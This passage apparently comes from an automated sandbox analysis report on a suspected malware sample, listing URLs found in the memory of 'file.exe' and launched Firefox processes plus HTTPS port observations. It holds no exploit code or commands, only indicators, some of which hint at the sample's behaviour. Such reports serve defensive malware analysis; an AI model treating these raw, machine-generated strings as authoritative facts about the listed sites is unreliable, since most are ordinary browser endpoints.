                          Source: firefox.exe, 00000012.00000003.3086335305.000001E959B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738887810.000001E959B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%sz
                          Source: firefox.exe, 00000012.00000003.3086335305.000001E959B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738887810.000001E959B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%szw
                          Source: 000003.log0.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?assetgroup=Addre
                          Source: 000003.log0.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
                          Source: 000003.log0.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                          Source: 000003.log0.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
                          Source: 000003.log0.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                          Source: 000003.log1.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/product_category_en/1.0.0/asset?assetgroup=ProductCate
                          Source: 000003.log0.22.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
                          Source: firefox.exe, 00000012.00000003.2738811203.000001E959B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
                          Source: firefox.exe, 00000012.00000003.2875877920.000001E95D258000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2869503726.000001E95DC88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/
                          Source: firefox.exe, 00000012.00000003.2869503726.000001E95DC9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://extensionworkshop.com/documentation/publish/self-distribution/SelectOptionsLengthAssignmentW
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
                          Source: firefox.exe, 00000012.00000003.2696026363.000001E95C7D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2859795399.000001E95C7D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox-source-docs.mozilla.org/performance/scroll-linked_effects.html
                          Source: firefox.exe, 00000012.00000003.2803764583.000001E956991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com
                          Source: firefox.exe, 00000012.00000003.2803764583.000001E956991000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/
                          Source: firefox.exe, 00000012.00000003.2803394279.000001E9569C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/monitor/collections/changes/changeset?_expe
                          Source: firefox.exe, 00000012.00000003.2740267659.000001E957740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fpn.firefox.com
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getpocket.com/recommendations
                          Source: firefox.exe, 00000012.00000003.2479180713.000001E95A52A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2475465600.000001E95A300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2478451218.000001E95A508000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mozilla-services/screenshots
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google.com
                          Source: firefox.exe, 00000012.00000003.2742111843.000001E955CB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: firefox.exe, 00000012.00000003.3085758386.000001E95A3BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit
                          Source: firefox.exe, 00000012.00000003.3085020298.000001E95AB29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/telemetry/3eb2db8e-f770-4c52-9d7b-27180bea4925/main/Fi
                          Source: firefox.exe, 00000012.00000003.3085020298.000001E95AB29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/telemetry/4cb4db2a-ee68-4128-8ff4-f04bdc710c24/event/F
                          Source: firefox.exe, 00000012.00000003.3085020298.000001E95AB29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/telemetry/75265401-2d75-4127-a70f-7d6e61df69a0/health/
                          Source: firefox.exe, 00000012.00000003.3085020298.000001E95AB29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/telemetry/7e03a685-c52e-4810-b494-0f433b33ac49/event/F
                          Source: firefox.exe, 00000012.00000003.3085020298.000001E95AB29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/telemetry/86928e7f-6ba2-4b62-8ea8-d89cfd7a97ca/main/Fi
                          Source: firefox.exe, 00000012.00000003.3085020298.000001E95AB5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/telemetry/b6281059-34c6-49d8-97c7-24de33b104ab/new-pro
                          Source: firefox.exe, 00000012.00000003.3085020298.000001E95AB5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/telemetry/b6dd686f-a071-4a96-9ec4-4a8ffdac9d0c/first-s
                          Source: firefox.exe, 00000012.00000003.3085020298.000001E95AB29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/telemetry/b7b7301e-d32e-49f7-b138-9fd21cf2ca6b/health/
                          Source: firefox.exe, 00000012.00000003.2607471320.000001E95ACF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com
                          Source: firefox.exe, 00000012.00000003.2607471320.000001E95ACF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/
                          Source: firefox.exe, 00000012.00000003.2803174232.000001E9569FA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2804241041.000001E955DF4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2803394279.000001E9569C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2699435502.000001E95A3D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
                          Source: firefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                          Source: firefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.comZ
                          Source: firefox.exe, 00000012.00000003.2738811203.000001E959B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
                          Source: firefox.exe, 00000012.00000003.2738811203.000001E959B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%s
                          Source: firefox.exe, 00000012.00000003.3086335305.000001E959B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738887810.000001E959B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.inbox.lv/compose?to=%sv
                          Source: firefox.exe, 00000012.00000003.2738811203.000001E959B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
                          Source: firefox.exe, 00000012.00000003.3086335305.000001E959B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738887810.000001E959B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
                          Source: firefox.exe, 00000012.00000003.2740267659.000001E957740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3085961974.000001E959BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2800500299.000001E959BBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738403683.000001E959BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://monitor.firefox.com
                          Source: firefox.exe, 00000012.00000003.2738811203.000001E959B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
                          Source: firefox.exe, 00000012.00000003.2738811203.000001E959B97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
                          Source: firefox.exe, 00000012.00000003.3086335305.000001E959B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738887810.000001E959B86000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
                          Source: firefox.exe, 00000012.00000003.2739028393.000001E959B5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://profiler.firefox.com/
                          Source: firefox.exe, 00000012.00000003.3084929600.000001E95ABCF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redirector.gvt1.com
                          Source: firefox.exe, 00000012.00000003.3086934152.000001E9569A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redirector.gvt1.com/
                          Source: firefox.exe, 00000012.00000003.3085869849.000001E95A254000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3085817538.000001E95A38D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://redirector.gvt1.com/edgedl/widevine-cdm/4.10.2557.0-win-x64.zip
                          Source: firefox.exe, 00000012.00000003.2740267659.000001E957740000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com
                          Source: firefox.exe, 00000012.00000003.2478451218.000001E95A508000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.com/
                          Source: firefox.exe, 00000012.00000003.3085961974.000001E959BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2800500299.000001E959BBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738403683.000001E959BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://screenshots.firefox.comp
                          Source: firefox.exe, 00000012.00000003.2801528953.000001E9577AA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=default-theme%40mozilla.org%2Caddons-
                          Source: firefox.exe, 00000012.00000003.2607471320.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3058630463.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2692741855.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/facebook.svg
                          Source: firefox.exe, 00000012.00000003.2607471320.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3058630463.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2692741855.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://smartblock.firefox.etp/play.svg
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://spocs.getpocket.com/user
                          Source: firefox.exe, 00000012.00000003.2607471320.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3058630463.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2691821176.000001E95AEFD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2692741855.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
                          Source: firefox.exe, 00000012.00000003.2740267659.000001E957740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3085961974.000001E959BAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2800500299.000001E959BBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738403683.000001E959BBE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
                          Source: firefox.exe, 00000012.00000003.3086795673.000001E9569C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3084305586.000001E95B0F2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3085817538.000001E95A38D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/captive-portal
                          Source: file.exe, 00000000.00000003.2331458680.000000002CFDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                          Source: firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/fix-video-audio-problems-firefox-windows
                          Source: file.exe, 00000000.00000003.2331458680.000000002CFDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
                          Source: firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2
                          Source: firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-3.1
                          Source: firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4
                          Source: firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7515#appendix-C)
                          Source: firefox.exe, 00000012.00000003.2740267659.000001E957740000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2738403683.000001E959BD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2800500299.000001E959BD9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://truecolors.firefox.com
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2740136811.000001E95775B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
                          Source: file.exe, 00000000.00000002.2564756762.0000000026CF2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2802529831.000001E95775B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2740136811.000001E95775B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2742111843.000001E955CB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
                          Source: firefox.exe, 00000012.00000003.2607471320.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2479180713.000001E95A52A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2475465600.000001E95A300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3058630463.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2479515609.000001E95A54B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2478451218.000001E95A508000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2692741855.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
                          Source: firefox.exe, 00000012.00000003.2898080233.000001E95BB00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                          Source: content_new.js.22.drString found in binary or memory: https://www.google.com/chrome
                          Source: firefox.exe, 00000012.00000003.2479180713.000001E95A52A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2475465600.000001E95A300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2479515609.000001E95A54B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2478451218.000001E95A508000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
                          Source: firefox.exe, 00000012.00000003.2607471320.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2479180713.000001E95A52A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2475465600.000001E95A300000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.3058630463.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2479515609.000001E95A54B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2478451218.000001E95A508000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2692741855.000001E95ACDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                          Source: firefox.exe, 00000012.00000003.2803174232.000001E9569FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                          Source: file.exe, 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
                          Source: file.exe, 00000000.00000003.2331458680.000000002CFDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                          Source: file.exe, 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/k.exe
                          Source: file.exe, 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/t.exe
                          Source: file.exe, 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                          Source: file.exe, 00000000.00000003.2331458680.000000002CFDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                          Source: file.exe, 00000000.00000003.2331458680.000000002CFDC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                          Source: firefox.exe, 00000012.00000003.2742641473.000001E955C59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: firefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                          Source: firefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.comZ
                          Source: firefox.exe, 00000012.00000003.2741788150.000001E955DD7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2804241041.000001E955DBF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.openh264.org/
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2740136811.000001E95775B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
                          Source: file.exe, 00000000.00000002.2564756762.0000000026CF2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2802529831.000001E95775B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2740136811.000001E95775B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2742111843.000001E955CB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
                          Source: firefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tsn.ca
                          Source: firefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.tsn.caZ
                          Source: firefox.exe, 00000012.00000003.2741671716.000001E956945000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2804070755.000001E956945000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                          Source: firefox.exe, 00000012.00000003.2739459008.000001E95777B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2740267659.000001E957730000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2740136811.000001E95775B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: firefox.exe, 00000012.00000003.2548119909.000001E95D137000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2803953162.000001E956949000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account
                          Source: firefox.exe, 00000011.00000002.2449212670.000001F2F2540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/account--attempting-deelevation89
                          Source: firefox.exe, 0000000E.00000002.2427010220.00000244DD650000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000003.2381619693.00000244DD66D000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.2427010220.00000244DD682000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.2442562466.00000244DF170000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000003.2393570102.00000244DD680000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.2410452799.00000244DD5A4000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000E.00000002.2410452799.00000244DD5A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=e
                          Source: firefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.comZ
                          Source: firefox.exe, 00000012.00000003.2875877920.000001E95D258000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2869503726.000001E95DC88000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2569023742.000001E95DC88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
                          Source: firefox.exe, 00000012.00000003.2588071863.000001E95CCC6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2695578457.000001E95CB72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2689096445.000001E95CB72000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com
                          Source: firefox.exe, 00000012.00000003.2825320343.000001E95CBDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000012.00000003.2593357627.000001E95CBDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/
                          Source: firefox.exe, 00000012.00000003.2736212002.00000BE3CEB03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.comZ
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62280
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62281
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62282
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62284
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50177
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50179
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50178
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62281 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62274
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50343 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62275
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50177 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 62278
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62308 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62275 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50445 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58917
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58916
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50172 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58918
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58912
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58914
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58911
                          Source: unknownNetwork traffic detected: HTTP traffic on port 62309 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58910
